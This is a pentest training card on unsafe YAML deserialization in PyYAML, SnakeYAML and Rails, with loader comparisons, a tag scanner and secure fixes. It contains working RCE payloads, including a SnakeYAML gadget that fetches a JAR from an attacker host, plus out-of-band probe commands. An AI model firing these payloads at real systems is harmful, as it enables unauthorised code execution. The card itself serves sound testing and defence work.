YAML unsafe load

web_injection_logic Difficulty 1–5 30 min certifiable

Theory

Why This Matters

CVE-2022-1471 (SnakeYAML before 2.0, CVSS 9.8) showed that Java's most popular YAML parsing library would instantiate arbitrary classes, and therefore run attacker-chosen code, when its default Constructor parsed user-supplied YAML containing class-name tags. SnakeYAML ships as a transitive dependency of Spring Boot, so the vulnerable library was present in a very large number of enterprise applications, although exploitation still required the application to parse attacker-controlled YAML. In the Python ecosystem, PyYAML's yaml.load() without a Loader argument has been documented as dangerous since 2006, yet as of 2022 GitHub code search still returned hundreds of thousands of uses of the unsafe pattern. In Ruby on Rails, CVE-2013-0156 let attackers embed YAML inside XML request parameters, which Rails then deserialized with Ruby's YAML parser; it led to mass exploitation of Rails applications. The YAML deserialization class of vulnerabilities is language-agnostic, pervasive, and consistently underestimated.

Core Concept

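YAML (YAML Ain't Markup Language) supports type tags: a tag instructs the parser to construct a specific language type from a node (a scalar, a sequence, or a mapping). In PyYAML, the !! shorthand expands to tag:yaml.org,2002:, and Python-specific types live under its python/ namespace: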

!!python/object/apply:os.system ["id"]

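The !!python/object/apply: tag causes PyYAML to import os and call os.system("id") while the document is being constructed. This is not a bug: it is the intended behavior of UnsafeLoader (also exposed as yaml.Loader), which is what a bare yaml.load() used before PyYAML 5.1. FullLoader also honored this tag until PyYAML 5.4 moved it to UnsafeLoader (the CVE-2020-14343 fix). The security flaw is using such a loader to parse untrusted input.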

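PyYAML loader hierarchy (PyYAML 5.1 and later, from most to least permissive):
1. UnsafeLoader (also yaml.Loader; the pre-5.1 default): honors every !!python/ tag, including object/apply; arbitrary code execution by design.
2. FullLoader (the default for a bare yaml.load() from 5.1 until 6.0, which made the Loader argument mandatory): supports a subset of Python tags; exploitable for code execution before 5.4 (CVE-2020-1747, CVE-2020-14343) and not recommended for untrusted input.
3. SafeLoader: restricts construction to standard YAML types (strings, numbers, booleans, null, timestamps, lists, dicts); Python type tags are rejected. Use it, directly or via yaml.safe_load(), for untrusted input.
4. BaseLoader: builds lists and dicts but keeps every scalar as a string; also safe, but loses type coercion.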
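
The hierarchy can be checked empirically. The sketch below assumes PyYAML 5.1 or later is installed and loads the same two documents with each loader: the benign os.getpid probe used in the assessment methodology, and a plain config snippet. FullLoader's handling of the tag is version-dependent (executed before 5.4, rejected from 5.4 on), so it is printed rather than relied upon; the load_with helper is illustrative.

```python
import os

import yaml  # PyYAML >= 5.1 assumed (UnsafeLoader and FullLoader exist from 5.1)

# Benign tagged document: calls os.getpid() only if the loader honours the tag.
TAGGED = "!!python/object/apply:os.getpid []"
# Plain config document used to show type-coercion differences.
PLAIN = "port: 8080\ndebug: true\n"

LOADERS = {
    "UnsafeLoader": yaml.UnsafeLoader,
    "FullLoader": yaml.FullLoader,
    "SafeLoader": yaml.SafeLoader,
    "BaseLoader": yaml.BaseLoader,
}


def load_with(doc, loader):
    """Return ('loaded', value) or ('rejected', first line of the error)."""
    try:
        return ("loaded", yaml.load(doc, Loader=loader))
    except yaml.YAMLError as exc:  # ConstructorError is a YAMLError subclass
        return ("rejected", str(exc).splitlines()[0])


tagged_results = {name: load_with(TAGGED, ldr) for name, ldr in LOADERS.items()}
plain_results = {name: load_with(PLAIN, ldr) for name, ldr in LOADERS.items()}

if __name__ == "__main__":
    for name in LOADERS:
        print(f"{name:12} tagged={tagged_results[name]} plain={plain_results[name]}")
```

UnsafeLoader returns the current process ID, SafeLoader raises a ConstructorError, and BaseLoader ignores the unknown tag and builds a plain empty list. For the plain document, SafeLoader yields an int and a bool while BaseLoader yields only strings.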

The violated invariant: YAML parsing must not execute code or instantiate arbitrary types when processing untrusted data. Parsing is a read-only operation; it must not have side effects.

Java's SnakeYAML (1.x with its default Constructor) accepts class-name tags analogous to PyYAML's:

!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://attacker.com/malicious.jar"]]]]

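Parsing this document makes SnakeYAML construct a URL, pass it to a new URLClassLoader, and pass that class loader to the ScriptEngineManager constructor. ScriptEngineManager then uses Java's ServiceLoader to discover ScriptEngineFactory implementations through that class loader, which fetches the remote JAR, loads the class named in its META-INF/services/javax.script.ScriptEngineFactory file, and instantiates it, running the attacker's static initializer and constructor. A single YAML document is therefore a complete RCE gadget.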
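
Because the dangerous step is construction rather than parsing, a document's tags can be inspected without risk by stopping at the composition stage. The following sketch assumes PyYAML is available; the find_nonstandard_tags helper and its allowlist are illustrative, not a library API. It composes a document into a node graph with SafeLoader, never constructing objects, and reports every tag outside the core YAML set, which surfaces the class-name tags of the gadget above. It is a triage aid for logs or captured traffic, not a substitute for a safe loader.

```python
import yaml  # PyYAML assumed; used only to compose nodes, never to construct objects
from yaml.nodes import MappingNode, SequenceNode

CORE_PREFIX = "tag:yaml.org,2002:"
# Illustrative allowlist: the standard tags SafeLoader knows how to construct.
CORE_SUFFIXES = {
    "str", "int", "float", "bool", "null", "seq", "map",
    "timestamp", "binary", "set", "omap", "pairs", "merge", "value",
}


def find_nonstandard_tags(text):
    """Return the sorted tags in `text` that fall outside the core YAML set."""
    found = set()
    for root in yaml.compose_all(text, Loader=yaml.SafeLoader):
        seen = set()  # ids of visited nodes; aliases can share or nest nodes
        stack = [root]
        while stack:
            node = stack.pop()
            if id(node) in seen:
                continue
            seen.add(id(node))
            tag = node.tag
            if not (tag.startswith(CORE_PREFIX) and tag[len(CORE_PREFIX):] in CORE_SUFFIXES):
                found.add(tag)
            if isinstance(node, SequenceNode):
                stack.extend(node.value)
            elif isinstance(node, MappingNode):
                for key, value in node.value:
                    stack.extend((key, value))
    return sorted(found)


if __name__ == "__main__":
    gadget = ('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader '
              '[[!!java.net.URL ["http://attacker.com/malicious.jar"]]]]')
    print(find_nonstandard_tags(gadget))
```

Local tags such as CloudFormation's !Ref also show up in the output; whether they are acceptable is a policy decision for the consuming application.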

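Ruby Psych (historical, fixed): Psych's YAML.load could instantiate arbitrary Ruby objects from !ruby/object: tags, and Rails exposed this through XML parameter parsing (CVE-2013-0156) and later through YAML-serialized Active Record columns (CVE-2022-32224). The fixes disabled YAML conversion of request parameters and restricted which classes may be deserialized.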

Technical Deep-Dive

# ── PyYAML exploitation ────────────────────────────────────────────────────
import yaml

# PAYLOAD 1: execute os.system() — classic PyYAML RCE
malicious_yaml_1 = "!!python/object/apply:os.system ['id']"

# PAYLOAD 2: subprocess — more flexible, captures output
malicious_yaml_2 = """
!!python/object/apply:subprocess.check_output
  - [id]
"""

# PAYLOAD 3: write file — persistent payload
malicious_yaml_3 = """
!!python/object/apply:subprocess.check_output
  - [bash, -c, "echo pwned > /tmp/yaml_rce_proof.txt"]
"""

# Trigger with an unsafe loader. UnsafeLoader (alias yaml.Loader) honors
# !!python/object/apply on every PyYAML version; FullLoader honored it only
# before 5.4, and a bare yaml.load() used FullLoader from 5.1 through 5.4.x
# (PyYAML 6.0 requires an explicit Loader argument)
result = yaml.load(malicious_yaml_1, Loader=yaml.UnsafeLoader)
# On PyYAML < 5.1: yaml.load(malicious_yaml_1) also works

# ── SAFE alternative ───────────────────────────────────────────────────────
safe_data = yaml.safe_load("name: alice\nrole: admin\n")
print(safe_data)   # {'name': 'alice', 'role': 'admin'}  — no code execution

# ── Detection: test an endpoint that accepts YAML input ───────────────────
import requests

# Craft an OOB DNS payload (safe for assessments)
oob_yaml = "!!python/object/apply:subprocess.check_output [[nslookup, YOUR.burpcollab.net]]"

resp = requests.post(
    "https://app.example.com/api/config",
    data=oob_yaml,
    headers={"Content-Type": "application/x-yaml"},
)
print(resp.status_code)
# Monitor Burp Collaborator for DNS callback → confirms unsafe YAML loading

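// ── Java SnakeYAML exploitation (CVE-2022-1471) ───────────────────────────
// JShell-style snippet; in a class, the imports go at the top of the file
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;

// Payload: load a malicious JAR via the URLClassLoader constructor tag.
// ScriptEngineManager's service lookup instantiates a class from the JAR,
// running its static initializer and constructor.
String yamlPayload =
    "!!javax.script.ScriptEngineManager " +
    "[!!java.net.URLClassLoader " +
    "[[!!java.net.URL [\"http://ATTACKER_IP:8888/malicious.jar\"]]]]\n";

// On the attacker server: serve a JAR whose
// META-INF/services/javax.script.ScriptEngineFactory names a class that
// calls Runtime.exec() in its static initializer or constructor
// Detected in traffic as: Content-Type: application/yaml or text/yaml

// SECURE fix: use SafeConstructor (passing LoaderOptions keeps this
// compiling on SnakeYAML 2.x)
Yaml yaml = new Yaml(new SafeConstructor(new LoaderOptions()));
Object parsed = yaml.load(yamlPayload);   // throws a YAMLException; no classes are instantiated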

# Quick test: probe YAML endpoint with a benign !!python/ tag
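curl -s -X POST https://app.example.com/api/config \
    -H "Content-Type: application/yaml" \
    -d '!!python/object/apply:os.getpid []'
# Single quotes stop interactive bash from history-expanding "!!".
# If the response echoes a PID-like integer, the tag was executed: the server
# uses UnsafeLoader (or FullLoader on PyYAML < 5.4)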

# OOB DNS via curl (executes only nslookup on the target; minimal side effects)
curl -s -X POST https://app.example.com/api/parse \
    -H "Content-Type: text/yaml" \
    -d '!!python/object/apply:subprocess.check_output [[nslookup, YOUR.burpcollab.net]]'
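
When several endpoints are probed in one session, a DNS callback is only useful if it can be traced back to the request that caused it. A minimal sketch, assuming a Collaborator-style domain you control (oob.example.net is a placeholder), embeds a random per-request label in the OOB payloads shown above; the build_oob_probe helper and the probe.jar path are hypothetical.

```python
import secrets


def build_oob_probe(collab_domain, stack="python"):
    """Return (token, yaml_payload) using a unique subdomain for attribution."""
    token = secrets.token_hex(6)  # 12 lowercase hex chars: a valid DNS label
    host = f"{token}.{collab_domain}"
    if stack == "python":
        # PyYAML UnsafeLoader (or FullLoader < 5.4): runs nslookup on the target
        payload = f"!!python/object/apply:subprocess.check_output [[nslookup, {host}]]"
    elif stack == "java":
        # SnakeYAML < 2.0 default Constructor: the JAR fetch triggers DNS and HTTP
        payload = (
            "!!javax.script.ScriptEngineManager "
            "[!!java.net.URLClassLoader "
            f'[[!!java.net.URL ["http://{host}/probe.jar"]]]]'
        )
    else:
        raise ValueError(f"unsupported stack: {stack!r}")
    return token, payload


if __name__ == "__main__":
    token, payload = build_oob_probe("oob.example.net")
    print(token, payload)
```

Record each token with the endpoint and content type it was sent to; a later interaction on that token's subdomain then identifies the vulnerable request.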

Security Assessment Methodology

Identify YAML input surfaces — Search for endpoints accepting Content-Type: application/yaml, text/yaml, or application/x-yaml. Also look for file upload endpoints accepting .yaml or .yml files, and configuration import features.
Probe with a benign tag — Submit !!python/object/apply:os.getpid [] (Python) or !!java.lang.Integer [42] (Java). If the response reflects a parsed integer or process ID, unsafe loading is confirmed without executing shell commands.
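Escalate with OOB DNS — Submit a payload that runs nslookup YOUR.burpcollab.net via subprocess.check_output (Python), or point SnakeYAML's URLClassLoader chain at a Collaborator URL (Java), where fetching the JAR itself produces DNS and HTTP interactions. Monitor for the callback. OOB confirmation keeps side effects to a minimum.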
Confirm OS command execution — Write a non-destructive proof file: echo "YAML_RCE" > /tmp/yaml_proof_$(date +%s).txt. Verify creation via a subsequent path-disclosure or file-read endpoint.
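Check Java applications for SnakeYAML version — Inspect pom.xml or build.gradle, and the resolved dependency tree since SnakeYAML usually arrives transitively, for snakeyaml < 2.0. CVE-2022-1471 is fixed in SnakeYAML 2.0, which no longer instantiates arbitrary classes from tags by default; on 1.x, only code that explicitly uses SafeConstructor is protected.
Test Ruby/Rails YAML handling — Rails' ActiveRecord::Base.yaml_column_permitted_classes setting (config.active_record.yaml_column_permitted_classes) determines which classes YAML-serialized columns may contain. Releases before the CVE-2022-32224 fixes (7.0.3.1, 6.1.6.1, 6.0.5.1, 5.2.8.1) have no such restriction.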
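
The SnakeYAML version check can be partly automated for Maven projects. The sketch below parses a pom.xml with the standard library, finds a declared org.yaml:snakeyaml dependency, and flags versions below 2.0. Assumptions: the version is a literal (property references such as ${snakeyaml.version} are reported as unresolved rather than guessed), and transitive copies, such as the one Spring Boot pulls in, are not visible in pom.xml at all; mvn dependency:tree output is the better source for those. The snakeyaml_status name and its status strings are hypothetical.

```python
import re
import xml.etree.ElementTree as ET


def _local(tag):
    """Strip an XML namespace: '{http://maven.apache.org/POM/4.0.0}version' -> 'version'."""
    return tag.rsplit("}", 1)[-1]


def _child_text(elem, name):
    """Text of the first direct child with local name `name`, or ''."""
    for child in elem:
        if _local(child.tag) == name:
            return (child.text or "").strip()
    return ""


def snakeyaml_status(pom_xml):
    """Classify a declared org.yaml:snakeyaml dependency in a pom.xml string.

    Returns (status, version): status is 'absent', 'vulnerable' (< 2.0),
    'fixed' (>= 2.0), or 'unresolved' (version is a property or managed elsewhere).
    """
    root = ET.fromstring(pom_xml)
    for dep in root.iter():
        if _local(dep.tag) != "dependency":
            continue
        if (_child_text(dep, "groupId"), _child_text(dep, "artifactId")) != ("org.yaml", "snakeyaml"):
            continue
        version = _child_text(dep, "version")
        major = re.match(r"\d+", version)
        if major is None:
            return "unresolved", version  # e.g. ${snakeyaml.version}, or '' when a BOM manages it
        return ("vulnerable" if int(major.group()) < 2 else "fixed"), version
    return "absent", None
```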

Defensive Countermeasure — In Python, always use yaml.safe_load() or explicitly pass Loader=yaml.SafeLoader to yaml.load(). Never use FullLoader, UnsafeLoader (yaml.Loader), yaml.full_load(), or yaml.unsafe_load() on untrusted input. In Java, instantiate SnakeYAML as new Yaml(new SafeConstructor(new LoaderOptions())) and upgrade to SnakeYAML >= 2.0. In CI, add a static analysis rule banning yaml.load( without SafeLoader. For Ruby on Rails, configure yaml_column_permitted_classes to an explicit allowlist.

Common Assessment Errors

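Assuming PyYAML >= 5.1 is safe by default — PyYAML 5.1 made FullLoader the default for a bare yaml.load(), but FullLoader remained exploitable until 5.4 (CVE-2020-1747, CVE-2020-14343), and code that explicitly passes UnsafeLoader or yaml.Loader is unsafe on every version. Only SafeLoader (or BaseLoader) is appropriate for untrusted input.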
Only testing the explicit yaml.load() call — Libraries that wrap YAML parsing (e.g., configuration loaders, ORM serializers, REST framework body parsers) may internally call yaml.load(). Test all YAML-accepting endpoints, not just ones where you see yaml.load() in the source.
Missing YAML input in non-obvious content types — Some applications accept YAML with Content-Type: text/plain or application/octet-stream. Try YAML payloads across all content types.
Forgetting Ruby and Java — SnakeYAML and Psych are widely deployed, and both have had exploitable deserialization paths. YAML deserialization is not Python-specific.
Not testing file-based YAML input — Configuration file import features that parse YAML from uploaded files are a common overlooked vector.
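Treating a 400/500 error as safe — An error on a !!python/ probe does not prove SafeLoader is in use. An unsafe loader may have constructed the object (executing the call) before the application failed on the unexpected result type, FullLoader on PyYAML >= 5.4 rejects !!python/object/apply while remaining more permissive than SafeLoader, and a non-Python backend rejects the tag for unrelated reasons. Follow up with an OOB payload, which produces a callback even when the response is an error.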
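
The reasoning in the last item (an error response is not proof of safety) can be written down as a small decision table. The sketch below is illustrative: the ProbeResult fields and verdict strings are assumptions, not output from any tool. A reflected value or an OOB interaction confirms that the tag was constructed, an error without a callback stays inconclusive, and a clean response with no callback is only an absence of evidence.

```python
from dataclasses import dataclass


@dataclass
class ProbeResult:
    """Observations for one YAML probe (hypothetical structure)."""
    status: int            # HTTP status of the probe response
    oob_callback: bool     # DNS/HTTP interaction seen for this probe's token
    reflected_value: bool  # response echoes a value only the tag could produce (e.g. a PID)


def classify(result):
    """Map one probe's observations to a verdict, treating errors as inconclusive."""
    if result.oob_callback or result.reflected_value:
        return "unsafe: tag was constructed"
    if result.status >= 400:
        # SafeLoader rejecting the tag, FullLoader >= 5.4 rejecting object/apply,
        # or execution followed by a downstream failure all look alike here.
        return "inconclusive: error without callback; retry with an OOB payload"
    return "no evidence: nothing observed, which does not prove a safe loader"
```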

NICE Framework Alignment

Code	Knowledge/Skill/Task Statement	How This Card Develops It
K0009	Knowledge of application vulnerabilities	Explains YAML type tag mechanics and loader hierarchy across Python and Java
K0070	Knowledge of system and application security threats and vulnerabilities	Maps PyYAML yaml.load() RCE, SnakeYAML CVE-2022-1471, and the Rails YAML deserialization history to concrete exploitation paths
S0001	Skill in conducting vulnerability scans and recognizing vulnerabilities in security systems	Trains safe probing with benign tags before escalating to OOB confirmation
S0044	Skill in mimicking threat behaviors to test defenses	Develops payload crafting for PyYAML and SnakeYAML exploitation
T0028	Conduct and support authorized penetration testing on enterprise networks	Provides a staged methodology from probe through OOB through RCE confirmation
T0591	Perform penetration testing as required for new or updated applications	Frames YAML input testing as a required step for Python and Java applications